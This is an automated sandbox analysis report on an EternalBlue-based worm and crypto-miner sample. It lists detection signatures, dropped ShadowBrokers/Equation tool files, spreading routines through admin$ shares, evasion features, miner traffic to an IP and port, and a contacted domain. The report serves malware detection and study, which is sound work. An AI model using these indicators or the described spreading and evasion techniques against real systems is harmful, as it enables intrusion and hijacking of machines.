Windows Analysis Report
SecuriteInfo.com.Variant.Mikey.113879.32606.1960

Overview

General Information

Sample Name: SecuriteInfo.com.Variant.Mikey.113879.32606.1960 (renamed file extension from 1960 to exe)
Analysis ID: 611061
MD5: cc978b9f6e2f667d7f02eb94f868e34c
SHA1: 636f5d95ac54d2346f8d43d436ac62b74e72baca
SHA256: 7c8f444757a013aa7fd3578a16842d19e7e9d7828aa47c3ce2032ee58cd4b8c4
Tags: exe

Detection

ETERNALBLUE
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for dropped file
Yara detected ETERNALBLUE
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Sigma detected: Xmrig
Submitted sample is a known malware sample
Found stalling execution ending in API Sleep call
Found strings related to Crypto-Mining
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Sigma detected: Windows Crypto Mining Indicators
Contains functionality to enumerate network shares of other devices
Machine Learning detection for dropped file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality to upload files via FTP
Enables debug privileges
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Enables security privileges
Uses taskkill to terminate processes
Found evaded block containing many API calls
Contains functionality to query network adapter information
Sigma detected: Autorun Keys Modification

Classification

Classification chart (labels recovered from the image): Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; legend: clean, suspicious, malicious

AV Detection

Source: C:\ProgramData\libcurl.dll Avira: detection malicious, Label: EXP/Equation.G
Source: C:\ProgramData\adfw.dll Avira: detection malicious, Label: TR/ShadowBrokers.gpoeb
Source: C:\ProgramData\coli-0.dll Avira: detection malicious, Label: TR/Agent.mewnz
Source: C:\ProgramData\eteb-2.dll Avira: detection malicious, Label: TR/ShadowBrokers.asogb
Source: C:\ProgramData\dmgd-1.dll Avira: detection malicious, Label: TR/ShadowBrokers.dvwub
Source: C:\ProgramData\etebCore-2.x64.dll Avira: detection malicious, Label: TR/ShadowBrokers.WJ
Source: C:\ProgramData\cywkjq.exe Avira: detection malicious, Label: HEUR/AGEN.1213003
Source: C:\ProgramData\pcrecpp-0.dll Avira: detection malicious, Label: TR/ShadowBrokers.nphvl
Source: C:\ProgramData\cnli-0.dll Avira: detection malicious, Label: TR/ShadowBrokers.xbdrs
Source: C:\ProgramData\pcreposix-0.dll Avira: detection malicious, Label: TR/Equation.E
Source: C:\ProgramData\libxml2.dll Avira: detection malicious, Label: TR/Eqtonex.hjsmv
Source: C:\ProgramData\dmgd-4.dll Avira: detection malicious, Label: TR/ShadowBrokers.gzfza
Source: C:\ProgramData\esco-0.dll Avira: detection malicious, Label: TR/ShadowBrokers.pzirk
Source: C:\ProgramData\etchCore-0.x64.dll Avira: detection malicious, Label: TR/ShadowBrokers.A
Source: C:\ProgramData\etchCore-0.x86.dll Avira: detection malicious, Label: TR/ShadowBrokers.djauj
Source: C:\ProgramData\crli-0.dll Avira: detection malicious, Label: TR/ShadowBrokers.xvdds
Source: C:\ProgramData\adfw-2.dll Avira: detection malicious, Label: TR/ShadowBrokers.bhlos
Source: C:\ProgramData\iconv.dll Avira: detection malicious, Label: TR/Equation.B
Source: C:\ProgramData\libiconv-2.dll Avira: detection malicious, Label: TR/Eqtonex.lckrg
Source: C:\ProgramData\posh-0.dll Avira: detection malicious, Label: TR/Eqtonex.qkzfk
Source: C:\ProgramData\pcre-0.dll Avira: detection malicious, Label: TR/ShadowBrokers.gyswu
Source: C:\ProgramData\exma.dll Avira: detection malicious, Label: TR/ShadowBrokers.qdbcu
Source: C:\ProgramData\X64.dll Avira: detection malicious, Label: HEUR/AGEN.1229839
Source: C:\ProgramData\etebCore-2.x86.dll Avira: detection malicious, Label: EXP/Agent.asbdu
Source: C:\ProgramData\cnli-1.dll Avira: detection malicious, Label: EXP/Equation.H
Source: C:\ProgramData\libeay32.dll Avira: detection malicious, Label: TR/Agent.xdwkx
Source: C:\ProgramData\SMB.exe Avira: detection malicious, Label: TR/AD.DPulsarShellcode.sogzc
Source: C:\ProgramData\pcla-0.dll Avira: detection malicious, Label: TR/ShadowBrokers.lnsou
Source: C:\ProgramData\etch-0.dll Avira: detection malicious, Label: TR/Eqtonex.ergta
Source: C:\ProgramData\exma-1.dll Avira: detection malicious, Label: TR/Equation.DC
Source: C:\ProgramData\X86.dll Avira: detection malicious, Label: TR/Dldr.Agent.kapyv
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Avira: detected
Source: C:\ProgramData\SMB.exe Metadefender: Detection: 21%
Source: C:\ProgramData\SMB.exe ReversingLabs: Detection: 79%
Source: C:\ProgramData\X64.dll Metadefender: Detection: 43%
Source: C:\ProgramData\X64.dll ReversingLabs: Detection: 65%
Source: C:\ProgramData\X86.dll Metadefender: Detection: 48%
Source: C:\ProgramData\X86.dll ReversingLabs: Detection: 81%
Source: C:\ProgramData\adfw-2.dll Metadefender: Detection: 80%
Source: C:\ProgramData\adfw-2.dll ReversingLabs: Detection: 96%
Source: C:\ProgramData\adfw.dll Metadefender: Detection: 68%
Source: C:\ProgramData\adfw.dll ReversingLabs: Detection: 89%
Source: C:\ProgramData\cnli-0.dll Metadefender: Detection: 71%
Source: C:\ProgramData\cnli-0.dll ReversingLabs: Detection: 92%
Source: C:\ProgramData\cnli-1.dll Metadefender: Detection: 71%
Source: C:\ProgramData\cnli-1.dll ReversingLabs: Detection: 96%
Source: C:\ProgramData\coli-0.dll Metadefender: Detection: 80%
Source: C:\ProgramData\coli-0.dll ReversingLabs: Detection: 96%
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Joe Sandbox ML: detected
Source: C:\ProgramData\eteb-2.dll Joe Sandbox ML: detected
Source: C:\ProgramData\etebCore-2.x64.dll Joe Sandbox ML: detected
Source: C:\ProgramData\cywkjq.exe Joe Sandbox ML: detected
Source: C:\ProgramData\dmgd-4.dll Joe Sandbox ML: detected
Source: C:\ProgramData\etebCore-2.x86.dll Joe Sandbox ML: detected
Source: C:\ProgramData\SMB.exe Joe Sandbox ML: detected
Source: C:\ProgramData\X86.dll Joe Sandbox ML: detected

Exploits

Source: Yara match File source: C:\ProgramData\eteb-2.dll, type: DROPPED
Source: Yara match File source: C:\ProgramData\svchostlong.exe, type: DROPPED

Bitcoin Miner

Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe String found in binary or memory: stratum+tcp://
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: SMB.exe, 00000025.00000002.334719426.0000000001350000.00000002.00000001.01000000.00000005.sdmp, SMB.exe, 00000025.00000000.283876071.0000000001350000.00000002.00000001.01000000.00000005.sdmp, SMB.exe, 00000040.00000000.301017387.0000000001350000.00000002.00000001.01000000.00000005.sdmp, SMB.exe, 00000040.00000002.604463756.0000000001350000.00000002.00000001.01000000.00000005.sdmp

Spreading

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00403A10 wsprintfA,WNetAddConnection2A,GetModuleFileNameA,wsprintfA,CopyFileA,wsprintfA,wsprintfA,CopyFileA,wsprintfA,WinExec,CopyFileA,SetFileAttributesA,CopyFileA,SetFileAttributesA,WNetCancelConnection2A, \\%s\admin$\spread.exe 0_2_00403A10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_004054A0 GetModuleFileNameA,GetLogicalDriveStringsA,GetDriveTypeA,CreateThread,CloseHandle,Sleep, 0_2_004054A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00404F50 FindFirstFileA,lstrcmpiA,StrStrIA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Sleep,FindNextFileA,FindClose, 0_2_00404F50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00435442 __EH_prolog3_GS,GetFullPathNameA,__cftof,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,_strlen, 0_2_00435442
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_004055E0 _fwprintf,FindFirstFileA,wsprintfA,wsprintfA,Sleep,MoveFileExA,Sleep,SetFileAttributesA,_fwprintf,FindNextFileA,FindClose, 0_2_004055E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0042EB4F __EH_prolog3,_strlen,__cftof,FtpFindFirstFileA,FtpSetCurrentDirectoryA,FtpSetCurrentDirectoryA, 0_2_0042EB4F
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132A2C3 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 37_2_0132A2C3
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133A536 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 37_2_0133A536
Source: C:\ProgramData\SMB.exe Code function: 37_2_01347D69 FindFirstFileExA, 37_2_01347D69
Source: C:\ProgramData\SMB.exe Code function: 37_2_01347E6F FindFirstFileExA,FindClose, 37_2_01347E6F

Networking

Source: Traffic Snort IDS: 2831812 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) 192.168.2.3:49767 -> 5.161.50.27:19999
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0042FBC5 FtpPutFileA, 0_2_0042FBC5
Source: global traffic TCP traffic: 192.168.2.3:49733 -> 119.91.92.254:3171
Source: spread.txt.0.dr String found in binary or memory: http://%s:%d/spread.txt
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, 00000000.00000002.336119364.000000000075C000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://192.168.2.3:19490/spread.txt
Source: libcurl.dll.37.dr String found in binary or memory: http://curl.haxx.se/V
Source: libcurl.dll.37.dr String found in binary or memory: http://curl.haxx.se/docs/copyright.htmlD
Source: libcurl.dll.37.dr String found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: libxml2.dll.37.dr String found in binary or memory: http://purl.oclc.org/dsdl/schematron
Source: libxml2.dll.37.dr String found in binary or memory: http://relaxng.org/ns/structure/1.0
Source: libxml2.dll.37.dr String found in binary or memory: http://relaxng.org/ns/structure/1.0allocating
Source: libxml2.dll.37.dr String found in binary or memory: http://www.ascc.net/xml/schematron
Source: libxml2.dll.37.dr String found in binary or memory: http://www.ascc.net/xml/schematronhttp://purl.oclc.org/dsdl/schematronallocating
Source: spread.txt.0.dr String found in binary or memory: http://www.baidu.com/search/spider.html
Source: spread.txt.0.dr String found in binary or memory: http://www.baidu.com/search/spider.html)
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, spread.txt.0.dr String found in binary or memory: http://www.baidu.com/search/spider.html)95.179.220.100Windows
Source: svchost.exe, 00000044.00000002.326835660.00000232F3C13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: libxml2.dll.37.dr String found in binary or memory: http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd
Source: libxml2.dll.37.dr String found in binary or memory: http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtdConverting
Source: spread.txt.0.dr String found in binary or memory: http://www.yzzswt.com
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, spread.txt.0.dr String found in binary or memory: http://www.yzzswt.comcmd
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, spread.txt.0.dr String found in binary or memory: http://www.yzzswt.comiexplore.exeopenWelcome
Source: zlib1.dll.37.dr String found in binary or memory: http://www.zlib.net/D
Source: svchost.exe, 00000034.00000002.604100531.000001D432E3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000034.00000002.604100531.000001D432E3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000034.00000002.604100531.000001D432E3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000034.00000002.604100531.000001D432E3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.comt
Source: svchost.exe, 00000044.00000003.326379431.00000232F3C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000034.00000002.604100531.000001D432E3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000034.00000002.604100531.000001D432E3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000044.00000003.326408152.00000232F3C5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000044.00000003.326379431.00000232F3C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000044.00000002.326881520.00000232F3C3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000044.00000003.326350081.00000232F3C67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000002.326953934.00000232F3C6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000044.00000003.326379431.00000232F3C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000044.00000003.326397018.00000232F3C47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000002.326913792.00000232F3C4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000044.00000002.326881520.00000232F3C3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000044.00000002.326881520.00000232F3C3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000044.00000003.326379431.00000232F3C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000044.00000003.326379431.00000232F3C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000044.00000003.326379431.00000232F3C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000044.00000002.326901499.00000232F3C43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326446529.00000232F3C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000044.00000002.326901499.00000232F3C43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326446529.00000232F3C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000044.00000003.326379431.00000232F3C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000044.00000002.326932605.00000232F3C5D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326408152.00000232F3C5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326446529.00000232F3C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000044.00000003.326408152.00000232F3C5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000044.00000002.326932605.00000232F3C5D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326408152.00000232F3C5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000044.00000002.326932605.00000232F3C5D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326408152.00000232F3C5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000044.00000002.326913792.00000232F3C4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326408152.00000232F3C5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000002.326901499.00000232F3C43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326446529.00000232F3C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000044.00000003.326379431.00000232F3C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000044.00000002.326881520.00000232F3C3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, spread.txt.0.dr String found in binary or memory: https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS
Source: svchost.exe, 00000044.00000002.326881520.00000232F3C3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000044.00000002.326881520.00000232F3C3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000002.326835660.00000232F3C13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000044.00000003.326440319.00000232F3C57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000044.00000003.326440319.00000232F3C57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000044.00000002.326881520.00000232F3C3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000044.00000002.326901499.00000232F3C43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326446529.00000232F3C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000044.00000003.326397018.00000232F3C47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000002.326913792.00000232F3C4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: unknown DNS traffic detected: queries for: caiyundf.cn
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0042CA50 socket,htons,inet_addr,connect,wsprintfA,send,recv,closesocket, 0_2_0042CA50

System Summary

Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, type: SAMPLE Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 11.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 66.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 11.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 36.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 66.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 65.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 65.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 36.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 0.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 00000024.00000002.284640590.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 0000000B.00000000.261054855.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 00000000.00000000.246392472.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 00000041.00000000.301932792.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 00000042.00000000.306247565.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 00000024.00000000.282865261.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 00000000.00000002.335862211.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 00000042.00000002.335587217.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 0000000B.00000002.271006999.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: 00000041.00000002.307114937.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 2480, type: MEMORYSTR Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4140, type: MEMORYSTR Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6760, type: MEMORYSTR Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6612, type: MEMORYSTR Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4204, type: MEMORYSTR Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: C:\ProgramData\coli-0.dll, type: DROPPED Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: C:\ProgramData\svchostromance.exe, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\svchostromance.exe, type: DROPPED Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: C:\ProgramData\svchostlong.xml, type: DROPPED Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: C:\ProgramData\svchostromance.xml, type: DROPPED Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: C:\ProgramData\etchCore-0.x64.dll, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\svchostlong.exe, type: DROPPED Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: C:\ProgramData\etchCore-0.x86.dll, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\zibe.dll, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\tibe.dll, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\serverlong.xml, type: DROPPED Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: C:\ProgramData\serverlong.exe, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\serverlong.exe, type: DROPPED Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: C:\ProgramData\etch-0.dll, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\spread.txt, type: DROPPED Matched rule: Detects Windows executables containing EternalBlue exploitation artifacts Author: ditekSHen
Source: C:\ProgramData\SMB.exe Dropped file: MD5: fb82ba8bb7a402b05d06436991b10321 Family: Leafminer Alias: RASPITE, Leafminer Description: Leafminer, uncovered by Symantec, is an Iranian threat group that has been targeting a broad list of government organizations and business verticals in various regions in the Middle East since at least early 2017. References: https://www.jpost.com/Israel-News/Politics-And-Diplomacy/Report-Iran-targeted-Israel-in-cyber-attack-563937 Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00631046 0_2_00631046
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_006314AF 0_2_006314AF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0066066D 0_2_0066066D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0061D6D3 0_2_0061D6D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00641710 0_2_00641710
